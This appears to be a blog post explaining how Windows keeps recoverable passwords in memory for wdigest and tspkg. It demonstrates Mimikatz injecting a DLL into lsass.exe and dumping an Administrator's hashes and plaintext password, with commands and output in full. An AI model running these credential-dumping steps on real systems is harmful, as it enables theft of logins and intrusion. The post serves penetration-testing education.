As you’ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French http://blog.gentilkiwi.com/mimikatz
Below is a demonstration of how to use mimikatz, all commands typed are in red:
(The privilege::debug command is not required if you are already system.)
C:\Mimikatz\x64>mimikatz
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;160179
Package d’authentification : NTLM
Utilisateur principal : Administrator
Domaine d’authentification : TestBox64
msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
wdigest : waza1234/
tspkg : waza1234/